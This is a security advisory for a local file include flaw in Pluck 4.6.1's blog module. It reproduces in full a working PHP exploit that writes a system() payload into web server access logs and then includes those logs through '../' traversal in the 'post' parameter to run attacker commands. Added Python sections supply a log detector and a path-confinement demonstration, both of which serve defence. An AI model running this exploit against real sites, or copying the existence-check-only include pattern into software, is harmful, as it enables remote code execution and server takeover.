Written by Alfons Luja
Tuesday, 24 March 2009 21:30
Pluck 'module_pages_site.php' Parameter Local File Include Vulnerability
-\\Bugtraq ID: 34207
-\\Class: Input Validation Error
-\\CVE:
-\\Remote: Yes
-\\Local: No
-\\Published: Mar 23 2009 12:00AM
-\\Updated: Mar 24 2009 07:06PM
-\\Credit: Alfons Luja
-\\Vulnerable: Pluck Pluck 4.6.1
-\\Discussion Pluck is prone to a local file-include vulnerability because it fails to properly sanitize user-supplied input: the 'post' parameter of 'data/modules/blog/module_pages_site.php' is appended to a fixed directory and passed to include() after nothing more than a file_exists() check, so '../' sequences in the parameter walk out of that directory.
An attacker can exploit this vulnerability to obtain potentially sensitive information and execute arbitrary local scripts in the context of the webserver process, including PHP code the attacker has first written into a file the server can read, such as its own access log. This may allow the attacker to compromise the application and the underlying computer; other attacks are also possible.
Pluck 4.6.1 is vulnerable; other versions may also be affected.
-\\Exploit(s)/PoC(s): Attackers can exploit this issue via a browser.
The following exploit code is available:
34207.php

<?php
/*
pluck v 4.6.1 LFI exploit
author : Alfons Luja

Vuln is in \data\modules\blog\module_pages_site.php

...
$includepage = 'blog_include.php';
//Only set 'view post'-page if a post has been specified
if (isset($_GET['post'])) {
    //Check if post exists, and include information
    if (file_exists('data/settings/modules/blog/posts/'.$_GET['post'])) {
        include('data/settings/modules/blog/posts/'.$_GET['post']);
        $module_page['viewpost'] = $post_title;
    }
}
...

Nothing to comment ;x

Greetings: For all friends and obvious for me ;D
*/

if($argc < 5) die("Use host port path command [www.example.com 80 pluck ls]\n");

set_time_limit(0);
error_reporting(0);

$host    = $argv[1];
$port    = $argv[2];
$path    = $argv[3];
$command = $argv[4];

//add something if not w00rking ;x
//Candidate access.log locations, each tried 1 to 11 directory levels above
//data/settings/modules/blog/posts/ (the directory the include is relative to)
$logfiles = array(
    "apache/logs/access.log",
    "var/log/httpd/access.log",
    "var/log/apache/access.log",
    "usr/local/apache2/logs/access.log",
);
//$shell[0] is the PHP payload that gets written into the log; the remaining
//entries are the traversal paths handed to the 'post' parameter
$shell = array("<?php echo(' e[Ho_trip ');system('$command');echo(' d34th_trip'); ?>");
foreach($logfiles as $log){
    for($depth = 1; $depth <= 11; $depth++){
        $shell[] = str_repeat("../",$depth).$log;
    }
}

function _hdr($int){
    //There was supposed to be no file_get_contents here
    global $shell,$host,$path;
    $header  = "GET /$host/$path/$shell[$int] HTTP/1.1\r\n";
    $header .= "Host: $host\r\n";
    $header .= "User-Agent: _echo [ru] (Win6.66; @)\r\n";
    $header .= "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\n";
    $header .= "Accept-Language: en-us,en;q=0.5\r\n";
    $header .= "Accept-Encoding: gzip,deflate\r\n";
    $header .= "Connection: close\r\n\r\n";
    return $header;
}

//Stage 1: send the payload as the request line so the web server writes it to access.log
function _inject($hosts,$ports){
    $hnd = fsockopen($hosts,$ports,$errno,$errstr,30);
    if(!$hnd) die("Injection error $errstr\n");
    fwrite($hnd,_hdr(0));
    fclose($hnd);
}

//Pull the command output from between the two markers in the returned page
function _result($data){
    $ret = explode(' e[Ho_trip ',$data);
    if(isset($ret[1]) && $ret[1] != ""){
        for($i = 1;$i<count($ret);$i++){
            $ret_2 = explode(' d34th_trip',$ret[$i]);
            if($i - count($ret) == -1){
                if($ret_2[0] != ""){
                    echo($ret_2[0]);
                } else {
                    die("Exploit failed!!\n");
                }
            }
        }
    }
}

//Stage 2: include each candidate log through the vulnerable 'post' parameter
function _exploit($hosts,$ports,$paths){
    global $shell;
    $count = count($shell);
    for($i=1;$i<$count;$i++){
        $tab = file_get_contents("http://".$hosts.":".$ports."/".$paths."/data/modules/blog/module_pages_site.php?post=$shell[$i]");
        _result($tab);
    }
}

echo("---- pluck v 4.6.1 -----\n\n".
     "Author: Alfons Luja\n".
     "Target: $host\n".
     "Path: $path\n".
     "Port: $port\n".
     "COM: $command\n".
     "Ex: poc.php www.example.com 80 pluck \"dir\"\n\n");

_inject($host,$port);
_exploit($host,$port,$path);
?>
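The exploit above leaves two distinct traces in the web server's access log: the poisoning request, whose request line carries a PHP open tag, and the include request, whose 'post' parameter traverses out of the posts directory. The following detector is an added example, not part of the advisory or of the exploit author's code. It parses Apache combined-format lines and flags both stages; the sample log lines are constructed to resemble what the two requests would leave behind next to benign traffic, and the log format, field names and marker strings are assumptions made for the example.

```python
"""Spot both stages of the log-poisoning LFI chain in Apache access-log lines.

Added example, not part of the original advisory. SAMPLE_LOG is constructed,
not captured traffic.
"""
import re
from urllib.parse import parse_qs, unquote, urlsplit

# Combined log format: ip ident user [time] "request" status size "referer" "ua"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] "(?P<request>.*?)" '
    r'(?P<status>\d{3}) (?P<size>\S+) "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$'
)
# A PHP open tag anywhere in the logged request line or User-Agent.
PHP_TAG_RE = re.compile(r"<\?(?:php|=)", re.IGNORECASE)
# '..' as a whole path component, with either separator.
TRAVERSAL_RE = re.compile(r"(?:^|[\\/])\.\.(?:[\\/]|$)")
# The script whose 'post' parameter is included without confinement.
VULN_SCRIPT = "/data/modules/blog/module_pages_site.php"

# Constructed sample: benign hit, stage 1 (payload in the request line,
# logged even though the server answered 404), stage 2 (traversal in 'post'),
# then a legitimate blog post view.
SAMPLE_LOG = r'''
10.0.0.5 - - [24/Mar/2009:21:30:01 +0100] "GET /pluck/index.php?page=blog HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
10.0.0.9 - - [24/Mar/2009:21:31:10 +0100] "GET /www.example.com/pluck/<?php echo(' e[Ho_trip ');system('ls');echo(' d34th_trip'); ?> HTTP/1.1" 404 210 "-" "_echo [ru] (Win6.66; @)"
10.0.0.9 - - [24/Mar/2009:21:31:12 +0100] "GET /pluck/data/modules/blog/module_pages_site.php?post=../../../../../../var/log/apache/access.log HTTP/1.1" 200 9001 "-" "Mozilla/5.0"
10.0.0.7 - - [24/Mar/2009:21:32:00 +0100] "GET /pluck/data/modules/blog/module_pages_site.php?post=hello-world.php HTTP/1.1" 200 1200 "-" "Mozilla/5.0"
'''


def parse_line(line):
    """Return the named fields of one combined-format line, or None if it does not parse."""
    m = LOG_RE.match(line)
    return m.groupdict() if m else None


def classify(entry):
    """Return the finding labels that apply to one parsed log entry."""
    findings = []
    request, ua = entry["request"], entry["ua"]
    # Stage 1: a PHP open tag reaching the log is a poisoning attempt
    # regardless of the response status the server gave.
    if PHP_TAG_RE.search(request) or PHP_TAG_RE.search(ua):
        findings.append("log-poisoning")
    # Stage 2: the blog module script called with a traversing 'post'.
    parts = request.split(" ")
    if len(parts) >= 2:
        url = urlsplit(parts[1])
        if url.path.endswith(VULN_SCRIPT):
            for value in parse_qs(url.query, keep_blank_values=True).get("post", []):
                # parse_qs decoded once; a second unquote catches double encoding.
                if TRAVERSAL_RE.search(unquote(value)):
                    findings.append("lfi-traversal")
                    break
    return findings


def scan(log_text):
    """Return [(ip, time, findings)] for every line that carries a finding."""
    hits = []
    for line in log_text.strip().splitlines():
        entry = parse_line(line)
        if entry is None:
            continue
        findings = classify(entry)
        if findings:
            hits.append((entry["ip"], entry["time"], findings))
    return hits


if __name__ == "__main__":
    for ip, when, findings in scan(SAMPLE_LOG):
        print(f"{when} {ip} {', '.join(findings)}")
```

Stage 1 is flagged on the open tag alone rather than on the exploit's marker strings, because those are trivially changed; stage 2 keys on the script path plus a '..' component after decoding, so a renamed log file or a different traversal depth still matches. Correlating both findings from the same client within a short window is what turns this into a high-confidence alert.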
-\\Solution Currently we are not aware of any vendor-supplied patches. If you feel we are in error or if you are aware of more recent information, please mail us.
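With no vendor patch listed, the root cause is worth spelling out in code: the vulnerable snippet checks that the concatenated path exists and then includes it, and existence says nothing about where the path resolved to. The block below is an added example written in Python, not Pluck's code and not a vendor fix; it re-creates the vulnerable lookup beside a confined one and runs both against the exploit's sixth traversal payload in a temporary directory tree that stands in for an install. Function names, the fixture layout and the sample file contents are assumptions made for the example.

```python
"""Existence check versus path confinement for the blog module's 'post' parameter.

Added example, not Pluck's code. The directory tree built by build_fixture()
is constructed for the demonstration and is not a real install.
"""
import os
import tempfile


def naive_lookup(posts_dir, post):
    """The pattern from module_pages_site.php: existence is the only check,
    so '../' components in `post` walk out of the posts directory."""
    candidate = os.path.join(posts_dir, post)
    return candidate if os.path.isfile(candidate) else None


def confined_lookup(posts_dir, post):
    """Resolve `post` only if the canonical result stays inside posts_dir.

    Rejects empty names, embedded NUL bytes (include-path truncation in old
    PHP), absolute paths, and any '../' that escapes, by comparing realpath()
    results instead of searching the string for '..'.
    """
    if not post or "\x00" in post:
        return None
    base = os.path.realpath(posts_dir)
    candidate = os.path.realpath(os.path.join(base, post))
    try:
        inside = os.path.commonpath([base, candidate]) == base
    except ValueError:  # different drives on Windows
        inside = False
    if not inside or not os.path.isfile(candidate):
        return None
    return candidate


def build_fixture():
    """Constructed layout: a Pluck-like tree with one legitimate post and an
    access.log six directory levels above the posts directory, the depth the
    exploit's '../../../../../../var/log/apache/access.log' entry reaches.
    Returns (posts_dir, legitimate_post_name, traversal_payload)."""
    root = tempfile.mkdtemp(prefix="pluck-lfi-")
    posts_dir = os.path.join(root, "site", "data", "settings", "modules", "blog", "posts")
    os.makedirs(posts_dir)
    log_dir = os.path.join(root, "var", "log", "apache")
    os.makedirs(log_dir)
    with open(os.path.join(posts_dir, "hello-world.php"), "w") as fh:
        fh.write("<?php $post_title = 'Hello world'; ?>\n")
    with open(os.path.join(log_dir, "access.log"), "w") as fh:
        # A poisoned log line as stage 1 of the exploit would leave it (constructed).
        fh.write('10.0.0.9 - - [24/Mar/2009:21:31:10 +0100] "GET /<?php system(\'id\'); ?> HTTP/1.1" 404 210\n')
    payload = "../../../../../../var/log/apache/access.log"
    return posts_dir, "hello-world.php", payload


if __name__ == "__main__":
    posts_dir, legit, payload = build_fixture()
    for name in (legit, payload):
        print(f"{name!r}: naive -> {naive_lookup(posts_dir, name) is not None}, "
              f"confined -> {confined_lookup(posts_dir, name) is not None}")
```

The naive lookup accepts the traversal payload because the log file really does exist, which is exactly why file_exists() is the wrong gate. Confinement by canonical path is the minimum; a whitelist of known post file names, which the blog module could derive from its own posts directory, is the stricter option when the set of includable files is fixed.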
-\\Reference(s) --Pluck Homepage http://www.pluck-cms.org (Pluck)